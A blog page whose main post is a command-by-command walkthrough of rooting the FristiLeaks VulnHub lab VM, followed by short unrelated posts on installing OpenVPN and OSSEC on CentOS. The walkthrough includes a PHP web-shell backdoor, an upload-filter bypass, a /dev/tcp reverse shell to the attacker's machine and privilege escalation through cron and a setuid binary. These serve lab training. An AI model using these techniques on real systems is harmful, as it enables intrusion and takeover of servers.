vulnhub.com fristileaks1.3

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/24 14:45 -> 16:30 (1hr 45min)

  # 2015/12/25 15:00 -> 17:45 (2hr 45min)

  # total time = 4hrs 30min



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found target: 192.168.56.102

  

* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found ports: 80



* enumerate port 80

  * wget http://192.168.56.102

  * cat index.html

  * wget http://192.168.56.102/images/keep-calm.png

  * wget http://192.168.56.102/robots.txt

    * robots.txt: disallow /cola /sisi /beer

  * wget http://192.168.56.102/cola/

    * since its not the URL, and we should drink fristi

  * wget http://192.168.56.102/fristi/

    * cat index.html

      * read description meta tag reg comment about base64

      * noticed second commented out base64

      * suspect username: eezeepz

    * extracted commented out line using vi

      * deleted other lines

      * joined all lines (:%j)

      * removed spaces (:%s/\ //g)

      * saved into fristi_img2.txt

  * base64 -d fristi_img2.txt > img2

  * file img2

  * mv img2 img2.png

  * suspect password: keKkeKKeKKeKkEkkEk



* access

  * http://192.168.56.102/fristi/

  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk

  * logged into http://192.168.56.102/fristi/login_success.php

  * clicked upload file link to http://192.168.56.102/fristi/upload.php

  * uploaded img2.png and got message regarding /uploads

  * verified upload location http://192.168.56.102/fristi/uploads/img2.png



* attempted shell access using weevely (failed)

  * generated weevely shell: weevely generate password shell.php

  * cp /usr/share/weevely/shell.php .

  * attempted upload: only allowed png,jpg,gif

  * mv shell.php shell.gif

  * uploaded and connected

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * fixed pythong issues

    * tar zxvf PySocks-1.5.6.tar.gz

    * cd PySocks-1.5.6/

    * ./setup.py build

    * ./setup.py install

  * weevely http://192.168.56.102/fristi/uploads/shell.gif password

  * unable to connect



* used old script to execute commands

  * renamed to shell.php.jpg

  * uploaded file

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id

  * uid=48(apache) gid=48(apache) groups=48(apache)

  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"

  * found: eezeepz, admin, fristigod, fristi

  * ls -l /home/

  * found: drwx---r-x. on eezeepz

  * ls -l /home/eezeepz

  * found: 

    * notes.txt

    * commands (various)

  * cat /home/eezeepz/notes.txt

  * found: 

    * cron runs /tmp/runthis with admin privileges every minute

    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin

    * access to /usr/bin/*

  * changed access to /home/admin

    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"

  * ls -las /home/admin/

  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)

  * cat /home/admin/whoisyourgodnow.txt

  * found: =RFn0AKnlMHMPIzpyuTI0ITG

  * cat /home/admin/cryptedpass.txt

  * found: mVGZ3O3omkJLmy2pcuTq

  * cat /home/admin/cryptpass.py

  * found:

    * function does base64 then rot13

  * created own script to decrypt password

  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq

  * found: thisisalsopw123

  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG

  * found: LetThereBeFristi!

 

* interactive shell

  * got tired of using the php script and decided to get interactive shell

  * on kali: nc -n -vvv -l -p 80

  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261

  * now have shell (without TTY, so cannot use su yet)

  * find files owned by users

    * find / -user eezeepz 2>&1 | grep -v "Permission denied"

    * find / -user admin 2>&1 | grep -v "Permission denied"

    * find / -user fristi 2>&1 | grep -v "Permission denied"

    * find / -user fristigod 2>&1 | grep -v "Permission denied"

      * found: /var/fristigod

    * found: empty mailboxes

    * found: /var/www/notes.txt 

      * not very useful since we already figured this out

  * tried to get tty shell 

    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells

    // http://netsec.ws/?p=337

  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

  * used: su fristigod and password: LetThereBeFristi!

  * cd /var/fristigod

  * ls -las 

  * found: .bash_history and .secret_admin_stuff

  * cat .bash_history

  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * ls -las /var/fristigod/.secret_admin_stuff/

  * found: suid/guid set on doCom file and owned by root:root

  * file /var/fristigod/.secret_admin_stuff/doCom

  * strings /var/fristigod/.secret_admin_stuff/doCom

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

  * found: Usage: ./program_name terminal_command ...

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)

  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash

  !! got root !!

  * found: cat /root/fristileaks_secrets.txt

  * cat /root/fristileaks_secrets.txt

  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1



# Other

* /root/.c has source for doCom

* cat /root/.mysql_history

  



* appendix

// http://snipplr.com/view/72936/simple-php-backdoor-shell/

-- start of old script -- 

<?php

if(isset($_REQUEST['cmd']))

{

  $cmd = $_REQUEST['cmd'];

  system($cmd);

  echo "<pre>$cmd</pre>";

}

else

{

  echo "<pre>usage: ?cmd=</pre>";

}

?>



-- end of old script





// modified cryptpass.py script

-- start of decryptpass.py script --

import base64,codecs,sys



#def encodeString(str):

#    base64string= base64.b64encode(str)

#    return codecs.encode(base64string[::-1], 'rot13')



def decodeString(str):

    rottedString= codecs.encode(str[::-1], 'rot13')

    return base64.b64decode(rottedString)



#cryptoResult=encodeString(sys.argv[1])

#print cryptoResult



#decryptedResult=decodeString(cryptoResult)

#print decryptedResult



decryptedResult=decodeString(sys.argv[1])

print decryptedResult

-- end of decryptpass.py script --

Installing OpenVPN 2.2 on CentOS 6.3 64bit

This post is just an update of a previous post that used CentOS 5.7 and OpenVPN 2.2 (http://nkush.blogspot.com.au/2011/10/installing-openvpn-22-on-centos-57.html). The basic instructions are the same, however this post uses some newer packages which may have been relocated to new URLs. Again this blog and the posts are mostly for my own reference and not intended as step-by-step instuctions for other systems/network administrators

Install RPMForge or RepoForge as it’s now known[1]

[Read More]

Installing OpenVPN 2.2 on Centos 5.7

OpenVPN is an SSL based VPN. There are other VPN solutions such as IPsec, etc. but OpenVPN provides a cost effective alternative. I like OpenVPN as it support two-way authentication, i.e. both the client and server authenticate using certificates. To install OpeVPN on CentOS we need a number of cryptographic libraries. The simplest way is to use the DAG/RPMForge repository.

Set-up the RPMForge repository [1], as this contains the packages necessary for the installation and the instructions are provided below. The instructions below are just to document this specific installation and therefore this blog post is not to be misinterpreted as a best practises guide. The instructions are adapted from the OpenVPN website [2], but this blog post is intended more as a quick and dirty guide to getting OpenVPN running on CentOS 5.7. Additionally the set-up and configuration of the client is considered beyond the scope of this blog post.

[Read More]

Installing OSSEC on Centos 5.7

OSSEC is an open source host-based IDS that performs log analysis, and is able to correlate and analyse logs for a number of Linux (and Windows, but that is outside the scope of this blog post) servers. The software architecture of OSSEC and the use of agents, lends OSSEC to flexible deployment and management [1].

Set-up the Atomic repository that already has the appropriate OSSEC packages and install them would be the easiest way. However I have a strong dislike for the use of the /var partition (most system administrators, hmm… well at-least I have always, set this up as a separate partition for ease of management and security reasons) as an install location, esp. when it has been specified as a “noexec” partition.

[Read More]
tar  centos  squid  snort  ossec  wget  ids  ips